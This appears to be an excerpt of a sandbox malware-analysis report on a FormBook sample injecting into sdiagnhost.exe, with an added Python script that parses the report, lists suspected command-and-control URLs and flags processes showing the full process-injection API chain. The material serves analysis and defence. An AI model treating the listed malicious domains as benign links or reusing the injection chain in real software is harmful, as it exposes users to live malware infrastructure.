                Source: C:\Windows\SysWOW64\sdiagnhost.exe | Code function: 9_2_044135C0 NtCreateMutant,LdrInitializeThunk
                Source: C:\Windows\SysWOW64\sdiagnhost.exe | Code function: 9_2_044139B0 NtGetContextThread,LdrInitializeThunk
                Source: C:\Windows\SysWOW64\sdiagnhost.exe | Code function: 9_2_04412C00 NtQueryInformationProcess
                Source: C:\Windows\SysWOW64\sdiagnhost.exe | Code function: 9_2_04412CC0 NtQueryVirtualMemory
                Source: C:\Windows\SysWOW64\sdiagnhost.exe | Code function: 9_2_04412CF0 NtOpenProcess
                Source: C:\Windows\SysWOW64\sdiagnhost.exe | Code function: 9_2_04412D00 NtSetInformationFile
                Source: C:\Windows\SysWOW64\sdiagnhost.exe | Code function: 9_2_04412DB0 NtEnumerateKey
                Source: C:\Windows\SysWOW64\sdiagnhost.exe | Code function: 9_2_04412E30 NtWriteVirtualMemory
                Source: C:\Windows\SysWOW64\sdiagnhost.exe | Code function: 9_2_04412EA0 NtAdjustPrivilegesToken
                Source: C:\Windows\SysWOW64\sdiagnhost.exe | Code function: 9_2_04412F60 NtCreateProcessEx
                Source: C:\Windows\SysWOW64\sdiagnhost.exe | Code function: 9_2_04412F90 NtProtectVirtualMemory
                Source: C:\Windows\SysWOW64\sdiagnhost.exe | Code function: 9_2_04412FA0 NtQuerySection
                Source: C:\Windows\SysWOW64\sdiagnhost.exe | Code function: 9_2_04412AB0 NtWaitForSingleObject
                Source: C:\Windows\SysWOW64\sdiagnhost.exe | Code function: 9_2_04412B80 NtQueryInformationFile
                Source: C:\Windows\SysWOW64\sdiagnhost.exe | Code function: 9_2_04413010 NtOpenDirectoryObject
                Source: C:\Windows\SysWOW64\sdiagnhost.exe | Code function: 9_2_04413090 NtSetValueKey
                Source: C:\Windows\SysWOW64\sdiagnhost.exe | Code function: 9_2_04413D70 NtOpenThread
                Source: C:\Windows\SysWOW64\sdiagnhost.exe | Code function: 9_2_04413D10 NtOpenProcessToken
                Source: C:\Windows\SysWOW64\sdiagnhost.exe | Code function: 9_2_001D90A0 NtCreateFile
                Source: C:\Windows\SysWOW64\sdiagnhost.exe | Code function: 9_2_001D9200 NtReadFile
                Source: C:\Windows\SysWOW64\sdiagnhost.exe | Code function: 9_2_001D92F0 NtDeleteFile
                Source: C:\Windows\SysWOW64\sdiagnhost.exe | Code function: 9_2_001D9390 NtClose
                Source: C:\Windows\SysWOW64\sdiagnhost.exe | Code function: 9_2_001D94F0 NtAllocateVirtualMemory
                Source: C:\Windows\SysWOW64\sdiagnhost.exe | Code function: 9_2_0424F733 NtMapViewOfSection
                Source: C:\Windows\SysWOW64\sdiagnhost.exe | Code function: 9_2_0424FA52 NtResumeThread
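The string and native-function rows above are the raw material an analyst turns into indicators and a process-to-dump decision, but the text export fuses the report's table columns together. The following is an added triage script, not part of the Joe Sandbox report and not Joe Sandbox code: it parses rows in the fused layout, groups the URLs by the process image they were found in, filters out the search-engine and Microsoft sign-in residue that a Windows sandbox leaves in browser-derived memory (the residue list is an analyst assumption, not something the report states), and checks which process exposes the complete section-map / APC / thread-context injection chain. The sample rows are a constructed subset copied from the report with one long URL shortened.

```python
import re
from collections import defaultdict
from urllib.parse import urlsplit

# Constructed sample: a few rows copied from the report, in the fused layout the
# HTML-to-text export produces (column labels run into the preceding cell).
# Not the full report; one long URL is shortened.
SAMPLE_ROWS = r"""
Source: sKyuoUfZdk.exe, 0000000A.00000002.3899309709.0000000001503000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.ssrnoremt-rise.sbs/3jsc/
Source: sdiagnhost.exe, 00000009.00000003.2776340324.0000000007538000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
Source: sdiagnhost.exe, 00000009.00000002.3900182865.0000000005720000.00000004.10000000.00040000.00000000.sdmp, sKyuoUfZdk.exe, 0000000A.00000002.3899874166.0000000004010000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://tenmyk.shop/qpp1/?GLvL=i6ILStp
Source: sdiagnhost.exe, 00000009.00000002.3898662883.00000000027C5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_01762B60 NtClose,LdrInitializeThunk,6_2_01762B60
Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_01762F30 NtCreateSection,6_2_01762F30
Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_01762D10 NtMapViewOfSection,6_2_01762D10
Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_01762E30 NtWriteVirtualMemory,6_2_01762E30
Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_01762EE0 NtQueueApcThread,6_2_01762EE0
Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_01764340 NtSetContextThread,6_2_01764340
Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_01762FB0 NtResumeThread,6_2_01762FB0
Source: C:\Windows\SysWOW64\sdiagnhost.exeCode function: 9_2_001D90A0 NtCreateFile,9_2_001D90A0
Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 0_2_0158EEA40_2_0158EEA4
"""

STRING_LABEL = "String found in binary or memory: "
CODE_LABEL = "Code function: "
# "<addr> <api>,<api>,...,<addr>": the trailing address is the report's third
# column fused onto the row; rows without API names look like "<addr><addr>".
CODE_TAIL = re.compile(r"^(?P<addr>\d+_\d+_[0-9A-Fa-f]+) ?(?P<apis>.*?),?(?P=addr)$")

# Native calls that together form the injection chain the report's signatures
# describe (map a section, write the payload, queue an APC / set the thread
# context, resume). The process exposing all of them is the one to dump.
INJECTION_CHAIN = frozenset({
    "NtCreateSection", "NtMapViewOfSection", "NtWriteVirtualMemory",
    "NtQueueApcThread", "NtSetContextThread", "NtResumeThread",
})

# Assumption (analyst choice, not from the report): hosts treated as OS/browser
# residue in a Windows sandbox so they do not drown out the real C2 candidates.
RESIDUE_HOSTS = ("duckduckgo.com", "ecosia.org", "search.yahoo.com",
                 "google.com", "login.live.com", "schemas.xmlsoap.org")


def is_residue(host):
    host = host.lower()
    return any(host == h or host.endswith("." + h) for h in RESIDUE_HOSTS)


def parse_report(text):
    """Return (urls_by_image, calls_by_process) from rows in the fused layout."""
    urls = defaultdict(set)    # "sKyuoUfZdk.exe" -> {url, ...}
    calls = defaultdict(set)   # ("PO 20495088.exe", 6) -> {"NtClose", ...}
    for raw in text.splitlines():
        line = raw.strip()
        if not line.startswith("Source: "):
            continue
        body = line[len("Source: "):]
        if STRING_LABEL in body:
            src, url = body.split(STRING_LABEL, 1)
            # Source column is "<image>, <dump-id>, <image>, <dump-id>, ...".
            for part in src.split(","):
                part = part.strip()
                if part.lower().endswith(".exe"):
                    urls[part].add(url.strip())
        elif CODE_LABEL in body:
            path, tail = body.split(CODE_LABEL, 1)
            m = CODE_TAIL.match(tail.strip())
            if not m:
                continue
            image = path.strip().rsplit("\\", 1)[-1]
            pid = int(m["addr"].split("_")[0])   # "<pid>_<run>_<address>"
            calls[(image, pid)].update(a for a in m["apis"].split(",") if a)
    return dict(urls), dict(calls)


def injection_capable(calls_by_process):
    """Processes whose native-call set covers the whole injection chain."""
    return {proc for proc, apis in calls_by_process.items() if INJECTION_CHAIN <= apis}


def candidate_c2(urls_by_image):
    """Host -> set of images it was found in, with sandbox/browser residue removed."""
    out = defaultdict(set)
    for image, found in urls_by_image.items():
        for url in found:
            host = urlsplit(url).hostname
            if host and not is_residue(host):
                out[host].add(image)
    return dict(out)


if __name__ == "__main__":
    urls_by_image, calls_by_process = parse_report(SAMPLE_ROWS)
    for host, images in sorted(candidate_c2(urls_by_image).items()):
        print(f"C2 candidate {host}: seen in {', '.join(sorted(images))}")
    for image, pid in sorted(injection_capable(calls_by_process)):
        print(f"injection chain complete in {image} (process index {pid})")
```

Run against the full export, the same two functions separate the FormBook-injected processes (index 6 of PO 20495088.exe and sdiagnhost.exe, which carry the copied ntdll stubs with LdrInitializeThunk) from the .NET dropper at index 0, and leave only the non-residue hosts for blocklisting or pivoting; the residue list should be extended per sandbox image rather than treated as authoritative.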

                Source: C:\Users\user\Desktop\PO 20495088.exe | Code function: 0_2_0158EEA4
                Source: C:\Users\user\Desktop\PO 20495088.exe | Code function: 0_2_054E72D8
                Source: C:\Users\user\Desktop\PO 20495088.exe | Code function: 0_2_054E0040
                Source: C:\Users\user\Desktop\PO 20495088.exe | Code function: 0_2_054E0006
                Source: C:\Users\user\Desktop\PO 20495088.exe | Code function: 0_2_054FCCF6
                Source: C:\Users\user\Desktop\PO 20495088.exe | Code function: 0_2_054FD828
                Source: C:\Users\user\Desktop\PO 20495088.exe | Code function: 0_2_054F9BE8
                Source: C:\Users\user\Desktop\PO 20495088.exe | Code function: 0_2_074816C3
                Source: C:\Users\user\Desktop\PO 20495088.exe | Code function: 0_2_074816F8
                Source: C:\Users\user\Desktop\PO 20495088.exe | Code function: 0_2_0748A2B8
                Source: C:\Users\user\Desktop\PO 20495088.exe | Code function: 0_2_07489E80
                Source: C:\Users\user\Desktop\PO 20495088.exe | Code function: 0_2_0748BD98
                Source: C:\Users\user\Desktop\PO 20495088.exe | Code function: 0_2_07489A48
                Source: C:\Users\user\Desktop\PO 20495088.exe | Code function: 0_2_0748B950
                Source: C:\Users\user\Desktop\PO 20495088.exe | Code function: 0_2_0748B960
                Source: C:\Users\user\Desktop\PO 20495088.exe | Code function: 0_2_0AD50040
                Source: C:\Users\user\Desktop\PO 20495088.exe | Code function: 6_2_004188D3
                Source: C:\Users\user\Desktop\PO 20495088.exe | Code function: 6_2_004030E0
                Source: C:\Users\user\Desktop\PO 20495088.exe | Code function: 6_2_0041028E
                Source: C:\Users\user\Desktop\PO 20495088.exe | Code function: 6_2_00410293
                Source: C:\Users\user\Desktop\PO 20495088.exe | Code function: 6_2_00416B13
                Source: C:\Users\user\Desktop\PO 20495088.exe | Code function: 6_2_004023F4
                Source: C:\Users\user\Desktop\PO 20495088.exe | Code function: 6_2_00402400
                Source: C:\Users\user\Desktop\PO 20495088.exe | Code function: 6_2_0042EC93
                Source: C:\Users\user\Desktop\PO 20495088.exe | Code function: 6_2_004104B3
                Source: C:\Users\user\Desktop\PO 20495088.exe | Code function: 6_2_0040E533
                Source: C:\Users\user\Desktop\PO 20495088.exe | Code function: 6_2_004025AA
                Source: C:\Users\user\Desktop\PO 20495088.exe | Code function: 6_2_004025B0
                Source: C:\Users\user\Desktop\PO 20495088.exe | Code function: 6_2_017B8158
                Source: C:\Users\user\Desktop\PO 20495088.exe | Code function: 6_2_017CA118
                Source: C:\Users\user\Desktop\PO 20495088.exe | Code function: 6_2_01720100
                Source: C:\Users\user\Desktop\PO 20495088.exe | Code function: 6_2_017E81CC
                Source: C:\Users\user\Desktop\PO 20495088.exe | Code function: 6_2_017F01AA
                Source: C:\Users\user\Desktop\PO 20495088.exe | Code function: 6_2_017C2000
                Source: C:\Users\user\Desktop\PO 20495088.exe | Code function: 6_2_017EA352
                Source: C:\Users\user\Desktop\PO 20495088.exe | Code function: 6_2_0173E3F0
                Source: C:\Users\user\Desktop\PO 20495088.exe | Code function: 6_2_017F03E6
                Source: C:\Users\user\Desktop\PO 20495088.exe | Code function: 6_2_017D0274
                Source: C:\Users\user\Desktop\PO 20495088.exe | Code function: 6_2_017B02C0
                Source: C:\Users\user\Desktop\PO 20495088.exe | Code function: 6_2_01730535
                Source: C:\Users\user\Desktop\PO 20495088.exe | Code function: 6_2_017F0591
                Source: C:\Users\user\Desktop\PO 20495088.exe | Code function: 6_2_017E2446
                Source: C:\Users\user\Desktop\PO 20495088.exe | Code function: 6_2_017D4420
                Source: C:\Users\user\Desktop\PO 20495088.exe | Code function: 6_2_017DE4F6
                Source: C:\Users\user\Desktop\PO 20495088.exe | Code function: 6_2_01730770
                Source: C:\Users\user\Desktop\PO 20495088.exe | Code function: 6_2_01754750
                Source: C:\Users\user\Desktop\PO 20495088.exe | Code function: 6_2_0172C7C0
                Source: C:\Users\user\Desktop\PO 20495088.exe | Code function: 6_2_0174C6E0
                Source: C:\Users\user\Desktop\PO 20495088.exe | Code function: 6_2_01746962
                Source: C:\Users\user\Desktop\PO 20495088.exe | Code function: 6_2_017329A0
                Source: C:\Users\user\Desktop\PO 20495088.exe | Code function: 6_2_017FA9A6
                Source: C:\Users\user\Desktop\PO 20495088.exe | Code function: 6_2_0173A840
                Source: C:\Users\user\Desktop\PO 20495088.exe | Code function: 6_2_01732840
                Source: C:\Users\user\Desktop\PO 20495088.exe | Code function: 6_2_0175E8F0
                Source: C:\Users\user\Desktop\PO 20495088.exe | Code function: 6_2_017168B8
                Source: C:\Users\user\Desktop\PO 20495088.exe | Code function: 6_2_017EAB40
                Source: C:\Users\user\Desktop\PO 20495088.exe | Code function: 6_2_017E6BD7
                Source: C:\Users\user\Desktop\PO 20495088.exe | Code function: 6_2_0172EA80
                Source: C:\Users\user\Desktop\PO 20495088.exe | Code function: 6_2_017CCD1F
                Source: C:\Users\user\Desktop\PO 20495088.exe | Code function: 6_2_0173AD00
                Source: C:\Users\user\Desktop\PO 20495088.exe | Code function: 6_2_0172ADE0
                Source: C:\Users\user\Desktop\PO 20495088.exe | Code function: 6_2_01748DBF
                Source: C:\Users\user\Desktop\PO 20495088.exe | Code function: 6_2_01730C00
                Source: C:\Users\user\Desktop\PO 20495088.exe | Code function: 6_2_01720CF2
                Source: C:\Users\user\Desktop\PO 20495088.exe | Code function: 6_2_017D0CB5
                Source: C:\Users\user\Desktop\PO 20495088.exe | Code function: 6_2_017A4F40
                Source: C:\Users\user\Desktop\PO 20495088.exe | Code function: 6_2_01750F30
                Source: C:\Users\user\Desktop\PO 20495088.exe | Code function: 6_2_017D2F30
                Source: C:\Users\user\Desktop\PO 20495088.exe | Code function: 6_2_01772F28
                Source: C:\Users\user\Desktop\PO 20495088.exe | Code function: 6_2_0173CFE0
                Source: C:\Users\user\Desktop\PO 20495088.exe | Code function: 6_2_01722FC8
                Source: C:\Users\user\Desktop\PO 20495088.exe | Code function: 6_2_017AEFA0
                Source: C:\Users\user\Desktop\PO 20495088.exe | Code function: 6_2_01730E59
                Source: C:\Users\user\Desktop\PO 20495088.exe | Code function: 6_2_017EEE26
                Source: C:\Users\user\Desktop\PO 20495088.exe | Code function: 6_2_017EEEDB
                Source: C:\Users\user\Desktop\PO 20495088.exe | Code function: 6_2_01742E90
                Source: C:\Users\user\Desktop\PO 20495088.exe | Code function: 6_2_017ECE93
                Source: C:\Users\user\Desktop\PO 20495088.exe | Code function: 6_2_0171F172
                Source: C:\Users\user\Desktop\PO 20495088.exe | Code function: 6_2_017FB16B
                Source: C:\Users\user\Desktop\PO 20495088.exe | Code function: 6_2_0176516C
                Source: C:\Users\user\Desktop\PO 20495088.exe | Code function: 6_2_0173B1B0
                Source: C:\Users\user\Desktop\PO 20495088.exe | Code function: 6_2_017E70E9
                Source: C:\Users\user\Desktop\PO 20495088.exe | Code function: 6_2_017EF0E0
                Source: C:\Users\user\Desktop\PO 20495088.exe | Code function: 6_2_017DF0CC
                Source: C:\Users\user\Desktop\PO 20495088.exe | Code function: 6_2_017370C0
                Source: C:\Users\user\Desktop\PO 20495088.exe | Code function: 6_2_0171D34C
                Source: C:\Users\user\Desktop\PO 20495088.exe | Code function: 6_2_017E132D
                Source: C:\Users\user\Desktop\PO 20495088.exe | Code function: 6_2_0177739A
                Source: C:\Users\user\Desktop\PO 20495088.exe | Code function: 6_2_017D12ED
                Source: C:\Users\user\Desktop\PO 20495088.exe | Code function: 6_2_0174B2C0
                Source: C:\Users\user\Desktop\PO 20495088.exe | Code function: 6_2_017352A0
                Source: C:\Users\user\Desktop\PO 20495088.exe | Code function: 6_2_017E7571
                Source: C:\Users\user\Desktop\PO 20495088.exe | Code function: 6_2_017CD5B0
                Source: C:\Users\user\Desktop\PO 20495088.exe | Code function: 6_2_01721460
                Source: C:\Users\user\Desktop\PO 20495088.exe | Code function: 6_2_017EF43F
                Source: C:\Users\user\Desktop\PO 20495088.exe | Code function: 6_2_017EF7B0
                Source: C:\Users\user\Desktop\PO 20495088.exe | Code function: 6_2_017E16CC
                Source: C:\Users\user\Desktop\PO 20495088.exe | Code function: 6_2_01739950
                Source: C:\Users\user\Desktop\PO 20495088.exe | Code function: 6_2_0174B950
                Source: C:\Users\user\Desktop\PO 20495088.exe | Code function: 6_2_017C5910
                Source: C:\Users\user\Desktop\PO 20495088.exe | Code function: 6_2_0179D800
                Source: C:\Users\user\Desktop\PO 20495088.exe | Code function: 6_2_017338E0
                Source: C:\Users\user\Desktop\PO 20495088.exe | Code function: 6_2_017EFB76
                Source: C:\Users\user\Desktop\PO 20495088.exe | Code function: 6_2_017A5BF0
                Source: C:\Users\user\Desktop\PO 20495088.exe | Code function: 6_2_0176DBF9
                Source: C:\Users\user\Desktop\PO 20495088.exe | Code function: 6_2_0174FB80
                Source: C:\Users\user\Desktop\PO 20495088.exe | Code function: 6_2_017A3A6C
                Source: C:\Users\user\Desktop\PO 20495088.exe | Code function: 6_2_017EFA49
                Source: C:\Users\user\Desktop\PO 20495088.exe | Code function: 6_2_017E7A46
                Source: C:\Users\user\Desktop\PO 20495088.exe | Code function: 6_2_017DDAC6
                Source: C:\Users\user\Desktop\PO 20495088.exe | Code function: 6_2_017CDAAC
                Source: C:\Users\user\Desktop\PO 20495088.exe | Code function: 6_2_01775AA0
                Source: C:\Users\user\Desktop\PO 20495088.exe | Code function: 6_2_017D1AA3
                Source: C:\Users\user\Desktop\PO 20495088.exe | Code function: 6_2_017E7D73
                Source: C:\Users\user\Desktop\PO 20495088.exe | Code function: 6_2_017E1D5A
                Source: C:\Users\user\Desktop\PO 20495088.exe | Code function: 6_2_01733D40
                Source: C:\Users\user\Desktop\PO 20495088.exe | Code function: 6_2_0174FDC0
                Source: C:\Users\user\Desktop\PO 20495088.exe | Code function: 6_2_017A9C32
                Source: C:\Users\user\Desktop\PO 20495088.exe | Code function: 6_2_017EFCF2
                Source: C:\Users\user\Desktop\PO 20495088.exe | Code function: 6_2_017EFF09
                Source: C:\Users\user\Desktop\PO 20495088.exe | Code function: 6_2_016F3FD5
                Source: C:\Users\user\Desktop\PO 20495088.exe | Code function: 6_2_016F3FD2
                Source: C:\Users\user\Desktop\PO 20495088.exe | Code function: 6_2_017EFFB1
                Source: C:\Users\user\Desktop\PO 20495088.exe | Code function: 6_2_01731F92
                Source: C:\Users\user\Desktop\PO 20495088.exe | Code function: 6_2_01739EB0
                Source: C:\Windows\SysWOW64\sdiagnhost.exe | Code function: 9_2_04492446
                Source: C:\Windows\SysWOW64\sdiagnhost.exe | Code function: 9_2_04484420
                Source: C:\Windows\SysWOW64\sdiagnhost.exe | Code function: 9_2_0448E4F6
                Source: C:\Windows\SysWOW64\sdiagnhost.exe | Code function: 9_2_043E0535
                Source: C:\Windows\SysWOW64\sdiagnhost.exe | Code function: 9_2_044A0591
                Source: C:\Windows\SysWOW64\sdiagnhost.exe | Code function: 9_2_043FC6E0
                Source: C:\Windows\SysWOW64\sdiagnhost.exe | Code function: 9_2_04404750
                Source: C:\Windows\SysWOW64\sdiagnhost.exe | Code function: 9_2_043E0770
                Source: C:\Windows\SysWOW64\sdiagnhost.exe | Code function: 9_2_043DC7C0
                Source: C:\Windows\SysWOW64\sdiagnhost.exe | Code function: 9_2_04472000
                Source: C:\Windows\SysWOW64\sdiagnhost.exeCode function: 9_2_044681589_2_04468158
                Source: C:\Windows\SysWOW64\sdiagnhost.exeCode function: 9_2_043D01009_2_043D0100
                Source: C:\Windows\SysWOW64\sdiagnhost.exeCode function: 9_2_0447A1189_2_0447A118
                Source: C:\Windows\SysWOW64\sdiagnhost.exeCode function: 9_2_044981CC9_2_044981CC
                Source: C:\Windows\SysWOW64\sdiagnhost.exeCode function: 9_2_044A01AA9_2_044A01AA
                Source: C:\Windows\SysWOW64\sdiagnhost.exeCode function: 9_2_044941A29_2_044941A2
                Source: C:\Windows\SysWOW64\sdiagnhost.exeCode function: 9_2_044802749_2_04480274
                Source: C:\Windows\SysWOW64\sdiagnhost.exeCode function: 9_2_044602C09_2_044602C0
                Source: C:\Windows\SysWOW64\sdiagnhost.exeCode function: 9_2_0449A3529_2_0449A352
                Source: C:\Windows\SysWOW64\sdiagnhost.exeCode function: 9_2_044A03E69_2_044A03E6
                Source: C:\Windows\SysWOW64\sdiagnhost.exeCode function: 9_2_043EE3F09_2_043EE3F0
                Source: C:\Windows\SysWOW64\sdiagnhost.exeCode function: 9_2_043E0C009_2_043E0C00
                Source: C:\Windows\SysWOW64\sdiagnhost.exeCode function: 9_2_043D0CF29_2_043D0CF2
                Source: C:\Windows\SysWOW64\sdiagnhost.exeCode function: 9_2_04480CB59_2_04480CB5
                Source: C:\Windows\SysWOW64\sdiagnhost.exeCode function: 9_2_043EAD009_2_043EAD00
                Source: C:\Windows\SysWOW64\sdiagnhost.exeCode function: 9_2_0447CD1F9_2_0447CD1F
                Source: C:\Windows\SysWOW64\sdiagnhost.exeCode function: 9_2_043F8DBF9_2_043F8DBF
                Source: C:\Windows\SysWOW64\sdiagnhost.exeCode function: 9_2_043DADE09_2_043DADE0
                Source: C:\Windows\SysWOW64\sdiagnhost.exeCode function: 9_2_043E0E599_2_043E0E59
                Source: C:\Windows\SysWOW64\sdiagnhost.exeCode function: 9_2_0449EE269_2_0449EE26
                Source: C:\Windows\SysWOW64\sdiagnhost.exeCode function: 9_2_0449EEDB9_2_0449EEDB
                Source: C:\Windows\SysWOW64\sdiagnhost.exeCode function: 9_2_043F2E909_2_043F2E90
                Source: C:\Windows\SysWOW64\sdiagnhost.exeCode function: 9_2_0449CE939_2_0449CE93
                Source: C:\Windows\SysWOW64\sdiagnhost.exeCode function: 9_2_04454F409_2_04454F40
                Source: C:\Windows\SysWOW64\sdiagnhost.exeCode function: 9_2_04422F289_2_04422F28
                Source: C:\Windows\SysWOW64\sdiagnhost.exeCode function: 9_2_04400F309_2_04400F30
                Source: C:\Windows\SysWOW64\sdiagnhost.exeCode function: 9_2_04482F309_2_04482F30
                Source: C:\Windows\SysWOW64\sdiagnhost.exeCode function: 9_2_043ECFE09_2_043ECFE0
                Source: C:\Windows\SysWOW64\sdiagnhost.exeCode function: 9_2_0445EFA09_2_0445EFA0
                Source: C:\Windows\SysWOW64\sdiagnhost.exeCode function: 9_2_043D2FC89_2_043D2FC8
                Source: C:\Windows\SysWOW64\sdiagnhost.exeCode function: 9_2_043EA8409_2_043EA840
                Source: C:\Windows\SysWOW64\sdiagnhost.exeCode function: 9_2_043E28409_2_043E2840
                Source: C:\Windows\SysWOW64\sdiagnhost.exeCode function: 9_2_043C68B89_2_043C68B8
                Source: C:\Windows\SysWOW64\sdiagnhost.exeCode function: 9_2_0440E8F09_2_0440E8F0
                Source: C:\Windows\SysWOW64\sdiagnhost.exeCode function: 9_2_043F69629_2_043F6962
                Source: C:\Windows\SysWOW64\sdiagnhost.exeCode function: 9_2_043E29A09_2_043E29A0
                Source: C:\Windows\SysWOW64\sdiagnhost.exeCode function: 9_2_044AA9A69_2_044AA9A6
                Source: C:\Windows\SysWOW64\sdiagnhost.exeCode function: 9_2_043DEA809_2_043DEA80
                Source: C:\Windows\SysWOW64\sdiagnhost.exeCode function: 9_2_0449AB409_2_0449AB40
                Source: C:\Windows\SysWOW64\sdiagnhost.exeCode function: 9_2_04496BD79_2_04496BD7
                Source: C:\Windows\SysWOW64\sdiagnhost.exeCode function: 9_2_043D14609_2_043D1460
                Source: C:\Windows\SysWOW64\sdiagnhost.exeCode function: 9_2_0449F43F9_2_0449F43F
                Source: C:\Windows\SysWOW64\sdiagnhost.exeCode function: 9_2_044975719_2_04497571
                Source: C:\Windows\SysWOW64\sdiagnhost.exeCode function: 9_2_0447D5B09_2_0447D5B0
                Source: C:\Windows\SysWOW64\sdiagnhost.exeCode function: 9_2_044916CC9_2_044916CC
                Source: C:\Windows\SysWOW64\sdiagnhost.exeCode function: 9_2_0449F7B09_2_0449F7B0
                Source: C:\Windows\SysWOW64\sdiagnhost.exeCode function: 9_2_0448F0CC9_2_0448F0CC
                Source: C:\Windows\SysWOW64\sdiagnhost.exeCode function: 9_2_044970E99_2_044970E9
                Source: C:\Windows\SysWOW64\sdiagnhost.exeCode function: 9_2_0449F0E09_2_0449F0E0
                Source: C:\Windows\SysWOW64\sdiagnhost.exeCode function: 9_2_043E70C09_2_043E70C0
                Source: C:\Windows\SysWOW64\sdiagnhost.exeCode function: 9_2_044AB16B9_2_044AB16B
                Source: C:\Windows\SysWOW64\sdiagnhost.exeCode function: 9_2_0441516C9_2_0441516C
                Source: C:\Windows\SysWOW64\sdiagnhost.exeCode function: 9_2_043CF1729_2_043CF172
                Source: C:\Windows\SysWOW64\sdiagnhost.exeCode function: 9_2_043EB1B09_2_043EB1B0
                Source: C:\Windows\SysWOW64\sdiagnhost.exeCode function: 9_2_043E52A09_2_043E52A0
                Source: C:\Windows\SysWOW64\sdiagnhost.exeCode function: 9_2_044812ED9_2_044812ED
                Source: C:\Windows\SysWOW64\sdiagnhost.exeCode function: 9_2_043FB2C09_2_043FB2C0
                Source: C:\Windows\SysWOW64\sdiagnhost.exeCode function: 9_2_0449132D9_2_0449132D
                Source: C:\Windows\SysWOW64\sdiagnhost.exeCode function: 9_2_043CD34C9_2_043CD34C
                Source: C:\Windows\SysWOW64\sdiagnhost.exeCode function: 9_2_0442739A9_2_0442739A
                Source: C:\Windows\SysWOW64\sdiagnhost.exeCode function: 9_2_04459C329_2_04459C32
                Source: C:\Windows\SysWOW64\sdiagnhost.exeCode function: 9_2_0449FCF29_2_0449FCF2
                Source: C:\Windows\SysWOW64\sdiagnhost.exeCode function: 9_2_04491D5A9_2_04491D5A
                Source: C:\Windows\SysWOW64\sdiagnhost.exeCode function: 9_2_04497D739_2_04497D73
                Source: C:\Windows\SysWOW64\sdiagnhost.exeCode function: 9_2_043E3D409_2_043E3D40
                Source: C:\Windows\SysWOW64\sdiagnhost.exeCode function: 9_2_043FFDC09_2_043FFDC0
                Source: C:\Windows\SysWOW64\sdiagnhost.exeCode function: 9_2_043E9EB09_2_043E9EB0
                Source: C:\Windows\SysWOW64\sdiagnhost.exeCode function: 9_2_0449FF099_2_0449FF09
                Source: C:\Windows\SysWOW64\sdiagnhost.exeCode function: 9_2_043E1F929_2_043E1F92
                Source: C:\Windows\SysWOW64\sdiagnhost.exeCode function: 9_2_0449FFB19_2_0449FFB1
                Source: C:\Windows\SysWOW64\sdiagnhost.exeCode function: 9_2_0444D8009_2_0444D800
                Source: C:\Windows\SysWOW64\sdiagnhost.exeCode function: 9_2_043E38E09_2_043E38E0
                Source: C:\Windows\SysWOW64\sdiagnhost.exeCode function: 9_2_044759109_2_04475910
                Source: C:\Windows\SysWOW64\sdiagnhost.exeCode function: 9_2_043E99509_2_043E9950
                Source: C:\Windows\SysWOW64\sdiagnhost.exeCode function: 9_2_043FB9509_2_043FB950
                Source: C:\Windows\SysWOW64\sdiagnhost.exeCode function: 9_2_0449FA499_2_0449FA49
                Source: C:\Windows\SysWOW64\sdiagnhost.exeCode function: 9_2_04497A469_2_04497A46
                Source: C:\Windows\SysWOW64\sdiagnhost.exeCode function: 9_2_04453A6C9_2_04453A6C
                Source: C:\Windows\SysWOW64\sdiagnhost.exeCode function: 9_2_0448DAC69_2_0448DAC6
                Source: C:\Windows\SysWOW64\sdiagnhost.exeCode function: 9_2_04425AA09_2_04425AA0
                Source: C:\Windows\SysWOW64\sdiagnhost.exeCode function: 9_2_0447DAAC9_2_0447DAAC
                Source: C:\Windows\SysWOW64\sdiagnhost.exeCode function: 9_2_04481AA39_2_04481AA3
                Source: C:\Windows\SysWOW64\sdiagnhost.exeCode function: 9_2_0449FB769_2_0449FB76
                Source: C:\Windows\SysWOW64\sdiagnhost.exeCode function: 9_2_04455BF09_2_04455BF0
                Source: C:\Windows\SysWOW64\sdiagnhost.exeCode function: 9_2_0441DBF99_2_0441DBF9
                Source: C:\Windows\SysWOW64\sdiagnhost.exeCode function: 9_2_043FFB809_2_043FFB80
                Source: C:\Windows\SysWOW64\sdiagnhost.exeCode function: 9_2_001C1F809_2_001C1F80
                Source: C:\Windows\SysWOW64\sdiagnhost.exeCode function: 9_2_001BCF309_2_001BCF30
                Source: C:\Windows\SysWOW64\sdiagnhost.exeCode function: 9_2_001BCF2B9_2_001BCF2B
                Source: C:\Windows\SysWOW64\sdiagnhost.exeCode function: 9_2_001BD1509_2_001BD150
                Source: C:\Windows\SysWOW64\sdiagnhost.exeCode function: 9_2_001BB1D09_2_001BB1D0
                Source: C:\Windows\SysWOW64\sdiagnhost.exeCode function: 9_2_001C55709_2_001C5570
                Source: C:\Windows\SysWOW64\sdiagnhost.exeCode function: 9_2_001C37B09_2_001C37B0
                Source: C:\Windows\SysWOW64\sdiagnhost.exeCode function: 9_2_001DB9309_2_001DB930
                Source: C:\Windows\SysWOW64\sdiagnhost.exeCode function: 9_2_042534799_2_04253479
                Source: C:\Windows\SysWOW64\sdiagnhost.exeCode function: 9_2_0424E71C9_2_0424E71C
                Source: C:\Windows\SysWOW64\sdiagnhost.exeCode function: 9_2_0424D7E89_2_0424D7E8
                Source: C:\Windows\SysWOW64\sdiagnhost.exeCode function: 9_2_0424E2689_2_0424E268
                Source: C:\Windows\SysWOW64\sdiagnhost.exeCode function: 9_2_0424E3839_2_0424E383
                Source: C:\Windows\SysWOW64\sdiagnhost.exeCode function: 9_2_0424CA939_2_0424CA93
                Source: C:\Windows\SysWOW64\sdiagnhost.exe Code function: String function: 0445F290 appears 105 times
                Source: C:\Windows\SysWOW64\sdiagnhost.exe Code function: String function: 043CB970 appears 280 times
